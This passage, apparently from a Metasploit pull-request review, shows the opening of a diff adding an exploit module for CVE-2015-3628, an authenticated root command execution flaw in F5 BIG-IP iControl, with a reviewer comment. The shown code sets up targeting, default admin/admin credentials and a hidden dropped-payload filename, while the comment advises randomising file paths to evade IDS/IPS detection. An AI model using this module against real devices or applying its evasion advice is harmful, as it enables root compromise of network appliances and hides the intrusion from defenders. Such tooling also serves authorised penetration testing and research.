modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,277 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "F5 iControl iCall::Script Root Command Execution",
+        'Description'    => %q{
+          This module exploits an authenticated a privilege escalation vulnerability
+          in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
+          credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
+          (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'tom' # Discovery, Metasploit module
+          ],
+        'References'     =>
+          [
+            ['CVE', '2015-3628'],
+            ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
+            ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
+          ],
+        'Platform'       => ['unix'],
+        'Arch'           => ARCH_CMD,
+        'Targets'        =>
+          [
+            ['F5 BIG-IP LTM 11.x', {}]
+          ],
+        'Privileged'     => true,
+        'DisclosureDate' => "Sep 3 2015",
+        'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+      ])
+    register_advanced_options(
+      [
+        OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
+        OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
+        OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
```

Comment:
Sorry for the miscommunication.  In general we try to keep file paths and other things that could be easily identified by an IDS/IPS/etc random.  In my most recent PR against this for you, I've addressed this.